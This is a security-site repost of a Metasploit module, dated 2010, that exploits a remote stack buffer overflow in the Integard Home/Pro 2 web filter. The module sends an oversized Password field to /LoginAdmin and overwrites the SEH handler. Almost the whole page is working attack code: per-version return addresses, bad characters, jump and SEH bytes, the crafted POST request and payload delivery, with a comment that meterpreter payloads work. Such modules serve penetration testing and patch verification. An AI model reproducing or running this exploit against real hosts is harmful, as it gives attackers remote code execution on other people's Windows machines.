首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Integard Home and Pro v2 Remote HTTP Buffer Overflow Exploit
来源:http://www.metasploit.com 作者:Lincoln 发布时间:2010-09-08  

class Metasploit3 < Msf::Exploit::Remote

 include Msf::Exploit::Remote::Tcp

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Integard Home/Pro version 2.0',
   'Description'    => %q{
     Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
   },
   'Author'  =>
    [
     'Lincoln',
     'Nullthreat',
     'rick2600',
    ],
   'License'       => MSF_LICENSE,
   'Version'       => '$Revision: $',
   'References'    =>
    [
     ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'thread',
    },
   'Payload'        =>
    {
     'Space'    => 2000,
     'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Privileged'     => false,
   'Targets'        =>
    [
     [ 'Automatic Targeting',          { 'auto' => true }],
     [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
     [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
    ],
   'DefaultTarget'  => 0))

  register_options(
   [
    Opt::RPORT(18881)
   ], self.class )
 end

 #Current version does not work with bind() type of payloads
 #meterpreter, windows/exec  etc works fine

 def exploit
  mytarget = target
  if(target['auto'])
   mytarget = nil
   print_status("[*] Automatically detecting the target...")
   connect
   get = "GET /banner.jpg HTTP/1.1\r\n\r\n"
   sock.put(get)
   data = sock.recv(1024)
    if (data =~ /Content-Length: 24584/)
     print_status("[!] Found Version - Integard Home")
     mytarget = self.targets[1]
    end
    if (data =~ /Content-Length: 23196/)
     print_status("[!] Found Version - Integard Pro")
     mytarget = self.targets[2]
    end
   sock.close
  end
  connect
  print_status("[!] Selected Target: #{mytarget.name}")
  print_status("[*] Building Buffer")
  pay = payload.encoded
  junk = rand_text_alpha_upper(3091 - pay.length)
  jmp = "\xE9\x2B\xF8\xFF\xFF"
  nseh = "\xEB\xF9\x90\x90"
  seh = [mytarget.ret].pack('V')
  buffer = junk + pay + jmp + nseh + seh
  print_status("[*] Sending Request")
  req = "POST /LoginAdmin HTTP/1.1\r\n"
  req << "Host: 192.168.2.129:18881\r\n"
  req << "Content-Length: 1074\r\n\r\n"
  req << "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
  sock.put(req)
  print_status("[*] Request Sent")
  sock.close
  handler
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Download Accelerator
·Live School Portal Database Di
·QQPlayer 2.3.696.400p1(.wav) D
·WebWiz Denial of Service POC
·ColdUserGroup 1.06 Blind SQL I
·ColdCalendar 2.06 SQL Injectio
·Java Bridge v. 5.5 Directory T
·ASPired2Count File Disclosure
·Novell Netware NWFTPD RMD/RNFR
·SeaMonkey DLL Hijacking (dwmap
·win32/vista sp1 ING. (cmd.exe)
·Internet Explorer Dll Hijackin
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved